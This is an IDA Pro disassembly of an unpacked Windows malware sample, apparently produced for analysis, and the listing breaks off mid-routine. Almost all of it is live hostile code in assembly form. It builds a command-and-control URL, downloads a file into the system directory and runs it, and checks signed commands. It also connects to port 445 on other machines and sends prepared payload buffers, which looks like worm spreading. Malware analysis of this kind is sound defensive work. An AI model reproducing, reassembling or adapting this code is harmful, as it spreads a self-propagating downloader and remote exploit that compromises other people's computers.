; ; +-------------------------------------------------------------------------+ ; | This file is generated by The Interactive Disassembler (IDA) | ; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> | ; | Licensed to: SRI, 1 computer, std, 05/2007 | ; +-------------------------------------------------------------------------+ ; ; ; +-------------------------------------------------------------------------+ ; | This file is generated by The Interactive Disassembler (IDA) | ; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> | ; | Licensed to: SRI, 1 computer, std, 05/2007 | ; +-------------------------------------------------------------------------+ ; ; Input MD5 : 486E5604B01DE9C8E8DD9B28335F9589 ; File Name : u:\work\486e5604b01de9c8e8dd9b28335f9589_unpacked.exe ; Format : Portable executable for 80386 (PE) ; Imagebase : 31420000 ; Section 1. (virtual address 00001000) ; Virtual size : 00005000 ( 20480.) ; Section size in file : 00005000 ( 20480.) ; Offset to raw data for section: 00001000 ; Flags E0000080: Bss Executable Readable Writable ; Alignment : default unicode macro page,string,zero irpc c,<string> db '&c', page endm ifnb <zero> dw zero endif endm .686p .mmx .model flat ; =========================================================================== ; Segment type: Pure code ; Segment permissions: Read/Write/Execute UPX0 segment para public 'CODE' use32 assume cs:UPX0 ;org 31421000h assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing dword_31421000 dd 77DDEAF4h ; resolved to->ADVAPI32.RegCreateKeyExAdword_31421004 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExAdword_31421008 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExAdword_3142100C dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_31422882+1Dr dword_31421010 dd 77DDEDE5h ; resolved to->ADVAPI32.RegDeleteValueAdword_31421014 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey ; sub_31422882+4Er ... dword_31421018 dd 77E34D78h ; resolved to->ADVAPI32.AbortSystemShutdownAdword_3142101C dd 77DEA2F9h ; resolved to->ADVAPI32.CryptCreateHashdword_31421020 dd 77DEA122h ; resolved to->ADVAPI32.CryptHashDatadword_31421024 dd 77DEAB80h ; resolved to->ADVAPI32.CryptVerifySignatureAdword_31421028 dd 77DEA254h ; resolved to->ADVAPI32.CryptDestroyHashdword_3142102C dd 77DEA544h ; resolved to->ADVAPI32.CryptDestroyKeydword_31421030 dd 77DE8546h ; resolved to->ADVAPI32.CryptReleaseContextdword_31421034 dd 77DE7F96h ; resolved to->ADVAPI32.CryptAcquireContextAdword_31421038 dd 77DEA879h ; resolved to->ADVAPI32.CryptImportKey align 10h dword_31421040 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_31421044 dd 7C809A51h ; resolved to->KERNEL32.VirtualAllocdword_31421048 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_3142104C dd 7C80BAA1h ; resolved to->KERNEL32.lstrcmpiAdword_31421050 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_31421054 dd 7C86136Dh ; resolved to->KERNEL32.WinExecdword_31421058 dd 7C864B0Fh ; resolved to->KERNEL32.CreateToolhelp32Snapshotdword_3142105C dd 7C863DE5h ; resolved to->KERNEL32.Process32Firstdword_31421060 dd 7C801E16h ; resolved to->KERNEL32.TerminateProcessdword_31421064 dd 7C863F58h ; resolved to->KERNEL32.Process32Nextdword_31421068 dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyA ; sub_31422B67+8Fr dword_3142106C dd 7C8308ADh ; resolved to->KERNEL32.CreateEventAdword_31421070 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObjectdword_31421074 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA ; sub_31422A9B+Fr dword_31421078 dd 7C810D87h ; resolved to->KERNEL32.WriteFiledword_3142107C dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_314211A0+F6r ... dword_31421080 dd 7C801A24h ; resolved to->KERNEL32.CreateFileA ; sub_314221C4+57r dword_31421084 dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenA ; sub_31421422+64r ... dword_31421088 dd 7C834D41h ; resolved to->KERNEL32.lstrcatA ; sub_31422A9B+40r dword_3142108C dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryA ; sub_31422A9B+1Br dword_31421090 dd 7C80D262h ; resolved to->KERNEL32.GetLocaleInfoAdword_31421094 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_31421801+16Cr ... dword_31421098 dd 7C80978Eh ; resolved to->KERNEL32.InterlockedExchangedword_3142109C dd 7C810111h ; resolved to->KERNEL32.lstrcpynAdword_314210A0 dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcessdword_314210A4 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_31421DF0+2Cr dword_314210A8 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_314223B2+116r dword_314210AC dd 7C80220Fh ; resolved to->KERNEL32.WriteProcessMemorydword_314210B0 dd 7C8309E1h ; resolved to->KERNEL32.OpenProcess ; sub_3142292E+92r dword_314210B4 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA ; UPX0:31422336r dword_314210B8 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCountdword_314210BC dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_314210C0 dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_31421F52+12r dword_314210C4 dd 7C802367h ; resolved to->KERNEL32.CreateProcessAdword_314210C8 dd 7C80A017h ; resolved to->KERNEL32.SetEventdword_314210CC dd 7C81320Ch ; resolved to->KERNEL32.OpenEventAdword_314210D0 dd 7C80C058h ; resolved to->KERNEL32.ExitThread ; sub_314221C4+66r ... dword_314210D4 dd 7C809766h ; resolved to->KERNEL32.InterlockedIncrement ; sub_314225C3+3Fr ... dword_314210D8 dd 7C80180Eh ; resolved to->KERNEL32.ReadFiledword_314210DC dd 7C810A77h ; resolved to->KERNEL32.GetFileSizedword_314210E0 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_31422A9B+C3r dword_314210E4 dd 7C910331h, 0 ; resolved to->NTDLL.RtlGetLastWin32Errordword_314210EC dd 77C371BCh ; resolved to->MSVCRT.sranddword_314210F0 dd 77C46F70h ; resolved to->MSVCRT.memcpydword_314210F4 dd 77C478A0h ; resolved to->MSVCRT.strlendword_314210F8 dd 77C475F0h ; resolved to->MSVCRT.memsetdword_314210FC dd 77C371D3h ; resolved to->MSVCRT.rand ; sub_31421F73:loc_31421F84r ... ; --------------------------------------------------------------------------- loc_31421100: ; DATA XREF: UPX0:loc_31422CD0r xchg eax, esp pop esp retn ; --------------------------------------------------------------------------- db 77h dword_31421104 dd 77C47C60h ; resolved to->MSVCRT.strstr ; sub_3142207E:loc_314220AFr ... dword_31421108 dd 77C47660h ; resolved to->MSVCRT.strchr ; sub_31421422+AAr align 10h dword_31421110 dd 7E42DE87h ; resolved to->USER32.FindWindowAdword_31421114 dd 7E41BE4Bh ; resolved to->USER32.GetForegroundWindowdword_31421118 dd 7E418A80h ; resolved to->USER32.GetWindowThreadProcessIddword_3142111C dd 7E41A8ADh ; resolved to->USER32.wsprintfA ; sub_314215C7+77r ... dd 0 dword_31421124 dd 42C30BFAh ; resolved to->WININET.InternetOpenUrlA ; sub_314215C7+9Dr dword_31421128 dd 42C2C8A1h ; resolved to->WININET.InternetOpenA ; sub_314215C7+89r dword_3142112C dd 42C1DAC1h ; resolved to->WININET.InternetCloseHandledword_31421130 dd 42C367F6h ; resolved to->WININET.InternetGetConnectedState ; UPX0:314227A2r dword_31421134 dd 42C2ABF4h ; resolved to->WININET.InternetReadFile ; sub_314215C7+B0r dd 0 dword_3142113C dd 71AB664Dh ; resolved to->WS2_32.WSAStartupdword_31421140 dd 71AB3E00h ; resolved to->WS2_32.binddword_31421144 dd 71AB88D3h ; resolved to->WS2_32.listendword_31421148 dd 71AC1028h ; resolved to->WS2_32.acceptdword_3142114C dd 71AB50C8h ; resolved to->WS2_32.gethostnamedword_31421150 dd 71AB94DCh ; resolved to->WS2_32.WSAGetLastErrordword_31421154 dd 71AB4FD4h ; resolved to->WS2_32.gethostbynamedword_31421158 dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_314221C4+ACr dword_3142115C dd 71AB3F41h ; resolved to->WS2_32.inet_ntoa ; sub_31422712+Dr dword_31421160 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_314221C4+F0r dword_31421164 dd 71AB406Ah ; resolved to->WS2_32.connectdword_31421168 dd 71AB428Ah ; resolved to->WS2_32.send ; sub_3142207E+67r ... dword_3142116C dd 71AB615Ah ; resolved to->WS2_32.recv ; sub_31421801+1D8r ... dword_31421170 dd 71AC0BDEh ; resolved to->WS2_32.shutdown ; sub_3142207E+128r dword_31421174 dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_3142207E+12Fr align 10h dword_31421180 dd 0FFFFFFFFh, 0 dd offset nullsub_1 align 10h dword_31421190 dd 0FFFFFFFFh, 0 dd offset nullsub_2 align 10h ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_314211A0 proc near ; CODE XREF: sub_31421422+16Dp var_110 = byte ptr -110h var_C = byte ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 110h push ebx push esi xor esi, esi push edi push esi push esi push esi push 1 push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"... call dword_31421128 ; InternetOpenA mov ebx, eax cmp ebx, esi jnz short loc_314211CB push 1 jmp loc_31421261 ; --------------------------------------------------------------------------- loc_314211CB: ; CODE XREF: sub_314211A0+22j lea eax, [ebp+var_110] push 104h push eax call dword_3142108C ; GetSystemDirectoryA mov edi, dword_31421088 lea eax, [ebp+var_110] push offset dword_314241F8 push eax call edi ; lstrcatA lea eax, [ebp+var_110] push 6 push eax call dword_31421084 ; lstrlenA lea eax, [ebp+eax+var_110] push eax call sub_31421F73 pop ecx lea eax, [ebp+var_110] pop ecx push offset dword_314241F0 push eax call edi ; lstrcatA push esi push esi push 2 push esi push esi lea eax, [ebp+var_110] push 40000000h push eax call dword_31421080 ; CreateFileA cmp eax, 0FFFFFFFFh mov [ebp+var_4], eax jnz short loc_31421241 push 2 jmp short loc_31421261 ; --------------------------------------------------------------------------- loc_31421241: ; CODE XREF: sub_314211A0+9Bj push esi push esi push esi push esi push [ebp+arg_0] push ebx call dword_31421124 ; InternetOpenUrlA cmp eax, esi mov [ebp+arg_0], eax jnz short loc_31421264 push [ebp+var_4] call dword_3142107C ; CloseHandle push 3 loc_31421261: ; CODE XREF: sub_314211A0+26j ; sub_314211A0+9Fj pop eax jmp short loc_314212B5 ; --------------------------------------------------------------------------- loc_31421264: ; CODE XREF: sub_314211A0+B4j mov edi, 100000h push edi call sub_31422CA5 mov ebx, eax pop ecx lea eax, [ebp+var_8] push eax push edi push ebx push [ebp+arg_0] call dword_31421134 ; InternetReadFile lea eax, [ebp+var_C] push esi push eax push [ebp+var_8] push ebx push [ebp+var_4] call dword_31421078 ; WriteFile push [ebp+var_4] call dword_3142107C ; CloseHandle lea eax, [ebp+var_110] push 5 push eax call sub_31421FA3 push ebx call sub_31422CB9 add esp, 0Ch xor eax, eax loc_314212B5: ; CODE XREF: sub_314211A0+C2j pop edi pop esi pop ebx leave retn sub_314211A0 endp ; =============== S U B R O U T I N E ======================================= sub_314212BA proc near ; CODE XREF: sub_31421422+F8p arg_0 = dword ptr 4 arg_4 = dword ptr 8 arg_8 = byte ptr 0Ch mov ecx, [esp+arg_4] mov eax, [esp+arg_0] push ebx push esi push edi or edi, 0FFFFFFFFh inc eax push 0Fh lea esi, [ecx+1] sub edi, ecx pop ecx loc_314212D1: ; CODE XREF: sub_314212BA+56j mov dl, [eax] mov bl, [eax-1] add edx, ecx add bl, cl sar edx, 4 and dl, 3 sub dl, [esp+0Ch+arg_8] shl bl, 2 or dl, bl mov [esi-1], dl mov dl, [eax+1] mov bl, [eax] dec dl add bl, cl and dl, cl sub dl, [esp+0Ch+arg_8] add eax, 3 shl bl, 4 and bl, 0F0h or dl, bl mov [esi], dl inc esi inc esi lea edx, [edi+esi] cmp edx, 30h jl short loc_314212D1 pop edi pop esi pop ebx retn sub_314212BA endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31421316 proc near ; CODE XREF: sub_3142139B+27p var_38 = byte ptr -38h var_1C = byte ptr -1Ch arg_0 = byte ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp sub esp, 38h push ebx push esi push edi push 6 pop ecx mov esi, offset aAbcdefghijklmn ; "ABCDEFGHIJKLMNOPQRSTUVWXYZ" lea edi, [ebp+var_1C] push 6 rep movsd movsw movsb pop ecx mov esi, offset aAbcdefghijkl_0 ; "abcdefghijklmnopqrstuvwxyz" lea edi, [ebp+var_38] mov ebx, [ebp+arg_4] rep movsd movsw test ebx, ebx movsb jge short loc_31421349 add ebx, 1Ah loc_31421349: ; CODE XREF: sub_31421316+2Ej movsx edi, [ebp+arg_0] mov esi, dword_31421108 lea eax, [ebp+var_1C] push edi push eax call esi ; strchr pop ecx test eax, eax pop ecx jz short loc_31421373 lea ecx, [ebp+var_1C] push 1Ah sub eax, ecx pop ecx add eax, ebx cdq idiv ecx mov al, [ebp+edx+var_1C] jmp short loc_31421396 ; --------------------------------------------------------------------------- loc_31421373: ; CODE XREF: sub_31421316+48j lea eax, [ebp+var_38] push edi push eax call esi ; strchr pop ecx test eax, eax pop ecx jz short loc_31421393 lea ecx, [ebp+var_38] push 1Ah sub eax, ecx pop ecx add eax, ebx cdq idiv ecx mov al, [ebp+edx+var_38] jmp short loc_31421396 ; --------------------------------------------------------------------------- loc_31421393: ; CODE XREF: sub_31421316+68j mov al, [ebp+arg_0] loc_31421396: ; CODE XREF: sub_31421316+5Bj ; sub_31421316+7Bj pop edi pop esi pop ebx leave retn sub_31421316 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_3142139B proc near ; CODE XREF: sub_31421422+D6p arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp mov eax, [ebp+arg_4] push esi mov esi, [ebp+arg_8] push edi mov al, [eax] test al, al jz short loc_314213F8 mov edi, [ebp+arg_0] push ebx loc_314213B0: ; CODE XREF: sub_3142139B+58j sub al, 2 inc [ebp+arg_4] mov bl, al mov eax, esi neg eax mov byte ptr [ebp+arg_0], bl push eax push [ebp+arg_0] call sub_31421316 mov [edi], al pop ecx inc edi cmp bl, 61h pop ecx jl short loc_314213DC cmp bl, 7Ah jg short loc_314213DC movsx esi, bl sub esi, 61h loc_314213DC: ; CODE XREF: sub_3142139B+34j ; sub_3142139B+39j cmp bl, 41h jl short loc_314213EC cmp bl, 5Ah jg short loc_314213EC movsx esi, bl sub esi, 41h loc_314213EC: ; CODE XREF: sub_3142139B+44j ; sub_3142139B+49j mov eax, [ebp+arg_4] mov al, [eax] test al, al jnz short loc_314213B0 pop ebx jmp short loc_314213FB ; --------------------------------------------------------------------------- loc_314213F8: ; CODE XREF: sub_3142139B+Fj mov edi, [ebp+arg_0] loc_314213FB: ; CODE XREF: sub_3142139B+5Bj and byte ptr [edi], 0 pop edi pop esi pop ebp retn sub_3142139B endp ; =============== S U B R O U T I N E ======================================= sub_31421402 proc near ; CODE XREF: sub_31421422+104p arg_0 = dword ptr 4 xor eax, eax xor ecx, ecx loc_31421406: ; CODE XREF: sub_31421402+12j mov edx, [esp+arg_0] movzx edx, byte ptr [ecx+edx] add eax, edx inc ecx cmp ecx, 30h jl short loc_31421406 push 1Ah cdq pop ecx idiv ecx mov eax, edx add eax, 61h retn sub_31421402 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31421422 proc near ; CODE XREF: sub_314215C7+BAp var_174 = dword ptr -174h var_170 = byte ptr -170h var_168 = byte ptr -168h var_164 = byte ptr -164h var_134 = dword ptr -134h var_130 = dword ptr -130h var_12C = dword ptr -12Ch var_128 = dword ptr -128h var_124 = byte ptr -124h var_11C = byte ptr -11Ch var_1C = dword ptr -1Ch var_10 = dword ptr -10h var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp push 0FFFFFFFFh push offset dword_31421180 push offset loc_31422CD0 mov eax, large fs:0 push eax mov large fs:0, esp sub esp, 164h push ebx push esi push edi mov [ebp+var_128], 1 and [ebp+var_4], 0 push offset aZer0 ; "zer0" push [ebp+arg_0] call dword_31421104 ; strstr pop ecx pop ecx mov edi, eax mov [ebp+var_130], edi test edi, edi jz loc_314215A8 add edi, 4 mov [ebp+var_130], edi jz loc_314215A8 push edi call dword_31421084 ; lstrlenA mov [ebp+var_1C], eax cmp eax, 50h jle loc_314215A8 and byte ptr [edi+100h], 0 mov al, [edi] mov [ebp+var_168], al movsx ebx, al sub ebx, 61h mov [ebp+var_12C], ebx js loc_314215A8 cmp ebx, 1Ah jge loc_314215A8 inc edi mov [ebp+var_130], edi push 7Eh push edi call dword_31421108 ; strchr pop ecx pop ecx mov esi, eax mov [ebp+var_134], esi test esi, esi jz loc_314215A8 mov al, [esi] mov [ebp+var_170], al and byte ptr [esi], 0 push ebx push edi lea eax, [ebp+var_11C] push eax call sub_3142139B mov al, [ebp+var_170] mov [esi], al inc esi mov [ebp+var_130], esi xor edi, edi push edi lea eax, [ebp+var_164] push eax lea eax, [esi+1] push eax call sub_314212BA lea eax, [ebp+var_164] push eax call sub_31421402 add esp, 1Ch cmp [esi], al jnz short loc_314215A8 push 44h push offset dword_31424000 lea eax, [ebp+var_124] push eax call sub_3142172F add esp, 0Ch lea eax, [ebp+var_174] push eax push 30h lea eax, [ebp+var_164] push eax lea eax, [ebp+var_11C] push eax call dword_31421084 ; lstrlenA push eax lea eax, [ebp+var_11C] push eax lea eax, [ebp+var_124] push eax call sub_3142179A add esp, 18h test eax, eax jnz short loc_3142159B cmp [ebp+var_174], edi jz short loc_3142159B lea eax, [ebp+var_11C] push eax call sub_314211A0 pop ecx mov [ebp+var_128], edi loc_3142159B: ; CODE XREF: sub_31421422+15Cj ; sub_31421422+164j lea eax, [ebp+var_124] push eax call sub_3142177E pop ecx loc_314215A8: ; CODE XREF: sub_31421422+4Ej ; sub_31421422+5Dj ... or [ebp+var_4], 0FFFFFFFFh call nullsub_1 mov eax, [ebp+var_128] mov ecx, [ebp+var_10] mov large fs:0, ecx pop edi pop esi pop ebx leave retn sub_31421422 endp ; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND] ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_314215C7 proc near ; CODE XREF: sub_314216A2+2Ap var_E8 = byte ptr -0E8h var_84 = byte ptr -84h var_4 = byte ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp sub esp, 0E8h push ebx push esi push edi push 4000h call sub_31422CA5 pop ecx mov esi, eax lea eax, [ebp+var_E8] push 63h push eax push 7 push 400h call dword_31421090 ; GetLocaleInfoA xor ebx, ebx cmp byte ptr [ebp+arg_4], bl jz short loc_3142162F lea eax, [ebp+var_E8] push eax lea eax, [ebp+var_84] push dword_31424FEC push dword_31425004 push offset aFgnsdrjyrsert ; "fgnsdrjyrsert" push [ebp+arg_0] push offset aHttpSIndex_php ; "http://%s/index.php?id=%s&scn=%d&inf=%d"... push eax call dword_3142111C ; wsprintfA add esp, 1Ch jmp short loc_31421647 ; --------------------------------------------------------------------------- loc_3142162F: ; CODE XREF: sub_314215C7+34j push [ebp+arg_0] lea eax, [ebp+var_84] push offset aHttpS ; "http://%s" push eax call dword_3142111C ; wsprintfA add esp, 0Ch loc_31421647: ; CODE XREF: sub_314215C7+66j push ebx push ebx push ebx push ebx push offset aMozilla4_0Co_0 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"... call dword_31421128 ; InternetOpenA push ebx mov edi, eax push ebx push ebx lea eax, [ebp+var_84] push ebx push eax push edi call dword_31421124 ; InternetOpenUrlA mov ebx, eax lea eax, [ebp+var_4] push eax push 2000h push esi push ebx call dword_31421134 ; InternetReadFile push esi mov [ebp+arg_4], eax call sub_31421422 push esi call sub_31422CB9 mov esi, dword_3142112C pop ecx pop ecx push ebx call esi ; InternetCloseHandle push edi call esi ; InternetCloseHandle mov eax, [ebp+arg_4] pop edi pop esi pop ebx leave retn sub_314215C7 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: noreturn sub_314216A2 proc near ; DATA XREF: sub_314223B2+15Bo push ebx mov ebx, dword_31421098 push esi push edi loc_314216AB: ; CODE XREF: sub_314216A2+88j xor esi, esi mov edi, 46021h loc_314216B2: ; CODE XREF: sub_314216A2+86j inc esi inc esi call sub_31422038 test eax, eax jz short loc_314216FC mov al, byte_31424080[esi+esi*4] push eax push off_31424081[esi+esi*4] call sub_314215C7 or eax, edi pop ecx xor eax, 8064h pop ecx shl eax, 3 mov edi, eax xor eax, 228h test ax, 0FFFFh jnz short loc_314216FC push 0 push offset dword_31425004 call ebx ; InterlockedExchange push 0 push offset dword_31424FEC call ebx ; InterlockedExchange loc_314216FC: ; CODE XREF: sub_314216A2+19j ; sub_314216A2+46j call dword_314210FC ; rand push 3 cdq pop ecx idiv ecx add esi, edx call sub_31422068 xor edx, edx mov ecx, 493E0h div ecx add edx, 61B48h push edx call dword_31421094 ; Sleep cmp esi, 16h jb short loc_314216B2 jmp loc_314216AB sub_314216A2 endp ; =============== S U B R O U T I N E ======================================= sub_3142172F proc near ; CODE XREF: sub_31421422+11Ep arg_0 = dword ptr 4 arg_4 = dword ptr 8 arg_8 = dword ptr 0Ch push ebx mov ebx, [esp+4+arg_0] push esi mov esi, dword_31421034 push edi xor edi, edi push edi push 1 push edi push edi push ebx call esi ; CryptAcquireContextA test eax, eax jnz short loc_3142175C push 8 push 1 push edi push edi push ebx call esi ; CryptAcquireContextA test eax, eax jnz short loc_3142175C push 1 pop eax jmp short loc_3142177A ; --------------------------------------------------------------------------- loc_3142175C: ; CODE XREF: sub_3142172F+19j ; sub_3142172F+26j lea eax, [ebx+4] push eax push edi push edi push [esp+18h+arg_8] push [esp+1Ch+arg_4] push dword ptr [ebx] call dword_31421038 ; CryptImportKey neg eax sbb eax, eax and al, 0FEh inc eax inc eax loc_3142177A: ; CODE XREF: sub_3142172F+2Bj pop edi pop esi pop ebx retn sub_3142172F endp ; =============== S U B R O U T I N E ======================================= sub_3142177E proc near ; CODE XREF: sub_31421422+180p arg_0 = dword ptr 4 push esi mov esi, [esp+4+arg_0] push dword ptr [esi+4] call dword_3142102C ; CryptDestroyKey push 0 push dword ptr [esi] call dword_31421030 ; CryptReleaseContext xor eax, eax pop esi retn sub_3142177E endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_3142179A proc near ; CODE XREF: sub_31421422+152p arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h arg_14 = dword ptr 1Ch push ebp mov ebp, esp push esi mov esi, [ebp+arg_0] push edi lea eax, [ebp+arg_0] xor edi, edi push eax push edi push edi push 8003h push dword ptr [esi] call dword_3142101C ; CryptCreateHash test eax, eax jnz short loc_314217C0 push 1 pop eax jmp short loc_314217FD ; --------------------------------------------------------------------------- loc_314217C0: ; CODE XREF: sub_3142179A+1Fj push edi push [ebp+arg_8] push [ebp+arg_4] push [ebp+arg_0] call dword_31421020 ; CryptHashData test eax, eax jnz short loc_314217D9 push 2 pop edi jmp short loc_314217F2 ; --------------------------------------------------------------------------- loc_314217D9: ; CODE XREF: sub_3142179A+38j push edi push edi push dword ptr [esi+4] push [ebp+arg_10] push [ebp+arg_C] push [ebp+arg_0] call dword_31421024 ; CryptVerifySignatureA mov ecx, [ebp+arg_14] mov [ecx], eax loc_314217F2: ; CODE XREF: sub_3142179A+3Dj push [ebp+arg_0] call dword_31421028 ; CryptDestroyHash mov eax, edi loc_314217FD: ; CODE XREF: sub_3142179A+24j pop edi pop esi pop ebp retn sub_3142179A endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31421801 proc near ; CODE XREF: sub_3142255F+36p ; sub_314225C3+48p ... var_89E4 = byte ptr -89E4h var_897C = byte ptr -897Ch var_690C = byte ptr -690Ch var_689C = byte ptr -689Ch var_5DD8 = byte ptr -5DD8h var_4834 = byte ptr -4834h var_4833 = byte ptr -4833h var_37A0 = byte ptr -37A0h var_2CDC = byte ptr -2CDCh var_2CDB = byte ptr -2CDBh var_2CD8 = byte ptr -2CD8h var_24F4 = byte ptr -24F4h var_24E4 = byte ptr -24E4h var_21C0 = byte ptr -21C0h var_21BC = byte ptr -21BCh var_21B0 = byte ptr -21B0h var_1F28 = byte ptr -1F28h var_1EAC = byte ptr -1EACh var_16DC = byte ptr -16DCh var_1231 = byte ptr -1231h var_F44 = byte ptr -0F44h var_EA4 = byte ptr -0EA4h var_798 = dword ptr -798h var_788 = byte ptr -788h var_774 = byte ptr -774h var_730 = byte ptr -730h var_134 = byte ptr -134h var_133 = byte ptr -133h var_E4 = byte ptr -0E4h var_E1 = byte ptr -0E1h var_B7 = byte ptr -0B7h var_B5 = byte ptr -0B5h var_B4 = byte ptr -0B4h var_6C = byte ptr -6Ch var_4C = byte ptr -4Ch var_24 = word ptr -24h var_22 = word ptr -22h var_20 = dword ptr -20h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_6 = byte ptr -6 var_5 = byte ptr -5 var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp mov eax, 89E4h call sub_31422CF0 mov eax, dword_31424C84 push ebx push edi push 1 pop edi xor ebx, ebx mov [ebp+var_14], eax mov eax, dword_31424C88 push ebx push edi push 2 mov [ebp+var_10], eax mov [ebp+var_C], edi call dword_31421158 ; socket cmp eax, 0FFFFFFFFh mov [ebp+var_4], eax jz loc_31421D61 push esi mov esi, [ebp+arg_0] push 1Dh push esi call dword_3142115C ; inet_ntoa push eax lea eax, [ebp+var_6C] push eax call dword_3142109C ; lstrcpynA lea eax, [ebp+var_6C] push eax lea eax, [ebp+var_4C] push offset loc_31424C78 push eax call dword_3142111C ; wsprintfA add esp, 0Ch xor ecx, ecx lea eax, [ebp+var_133] loc_31421874: ; CODE XREF: sub_31421801+83j mov dl, [ebp+ecx+var_4C] mov [eax-1], dl and byte ptr [eax], 0 inc ecx inc eax inc eax cmp ecx, 28h jl short loc_31421874 push 60h lea eax, [ebp+var_E4] push offset dword_31424798 push eax call sub_31422CE2 ; memcpy lea eax, [ebp+var_4C] push eax call sub_31422CDC ; strlen shl eax, 1 push eax lea eax, [ebp+var_134] push eax lea eax, [ebp+var_B4] push eax call sub_31422CE2 ; memcpy add esp, 1Ch lea eax, [ebp+var_4C] push 9 push (offset aC+3) push eax call sub_31422CDC ; strlen pop ecx lea eax, [ebp+eax*2+var_B5] push eax call sub_31422CE2 ; memcpy lea eax, [ebp+var_4C] push eax call sub_31422CDC ; strlen add al, 1Ah push edi shl al, 1 mov [ebp+var_5], al lea eax, [ebp+var_5] push eax lea eax, [ebp+var_E1] push eax call sub_31422CE2 ; memcpy lea eax, [ebp+var_4C] push eax call sub_31422CDC ; strlen shl al, 1 add al, 9 push edi mov [ebp+var_6], al lea eax, [ebp+var_6] push eax lea eax, [ebp+var_B7] push eax call sub_31422CE2 ; memcpy push 0E29h lea eax, [ebp+var_1F28] push 31h push eax call sub_31422CD6 ; memset push 10h lea eax, [ebp+var_24] push ebx push eax call sub_31422CD6 ; memset add esp, 44h mov [ebp+var_24], 2 push 1BDh call dword_31421160 ; ntohs mov [ebp+var_22], ax lea eax, [ebp+var_24] push 10h push eax push [ebp+var_4] mov [ebp+var_20], esi call dword_31421164 ; connect cmp eax, 0FFFFFFFFh jz loc_31421D57 mov esi, dword_31421094 mov edi, 0C8h push edi call esi ; Sleep push ebx mov ebx, dword_31421168 push 89h push offset dword_31424580 push [ebp+var_4] call ebx ; send push edi call esi ; Sleep push 0 lea eax, [ebp+var_774] push 640h push eax push [ebp+var_4] call dword_3142116C ; recv cmp eax, 0FFFFFFFFh jz loc_31421D4C push 0 push 0A8h push offset dword_3142460C push [ebp+var_4] call ebx ; send push edi call esi ; Sleep push 0 lea eax, [ebp+var_774] push 640h push eax push [ebp+var_4] call dword_3142116C ; recv cmp eax, 0FFFFFFFFh jz loc_31421D4C push 0 push 0DEh push offset dword_314246B8 push [ebp+var_4] call ebx ; send push edi call esi ; Sleep push 0 lea eax, [ebp+var_774] push 640h push eax push [ebp+var_4] call dword_3142116C ; recv cmp eax, 0FFFFFFFFh jz loc_31421D4C cmp eax, 46h jl loc_31421D4C cmp [ebp+var_730], 31h jnz loc_31421BF7 and [ebp+arg_0], 0 push 7D0h lea eax, [ebp+var_F44] push 90h push eax call sub_31422CD6 ; memset add esp, 0Ch push offset byte_314242B8 call dword_31421084 ; lstrlenA push eax lea eax, [ebp+var_EA4] push offset byte_314242B8 push eax call sub_31422CE2 ; memcpy add esp, 0Ch lea eax, [ebp+var_14] push eax call dword_31421084 ; lstrlenA push eax lea eax, [ebp+var_14] push eax lea eax, [ebp+var_788] push eax call sub_31422CE2 ; memcpy mov eax, dword_31424BBE add esp, 0Ch mov [ebp+var_798], eax loc_31421A98: ; CODE XREF: sub_31421801+4E1j movsx eax, [ebp+var_5] add eax, 4 push 0 push eax lea eax, [ebp+var_E4] push eax push [ebp+var_4] call ebx ; send push edi call esi ; Sleep push 0 lea eax, [ebp+var_774] push 640h push eax push [ebp+var_4] call dword_3142116C ; recv cmp eax, 0FFFFFFFFh jz loc_31421D4C push 0 push 68h push offset dword_314247FC push [ebp+var_4] call ebx ; send 